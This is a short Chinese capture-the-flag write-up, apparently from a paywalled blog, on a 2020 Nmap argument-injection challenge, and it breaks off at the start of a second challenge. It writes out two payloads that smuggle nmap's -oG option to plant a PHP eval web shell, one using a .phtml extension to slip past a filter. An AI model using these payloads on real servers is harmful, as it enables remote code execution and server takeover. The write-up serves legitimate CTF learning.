[网鼎杯 2020 朱雀组]Nmap
这题和之前有一道Online Tool很像,都是操纵NMAP。参数-oG会将结果存放到hack.php文件里
' <?php @eval($_POST["hack"]);?> -oG hack.php '
结果页面回显给我们一个Hacker…,看来是有什么被过滤了。测试下来是php被过滤了,换成标签phtml就可以了(注意两边两个单引号是要的)
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
上传成功后用蚁剑连接,cat /flag拿到flag
[MRCTF2020]PYWebsite
看一下源码发现了这个东西,想着怎么绕过MD5,访问flag.php后看样子用不着了,验证都是在后端的。
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
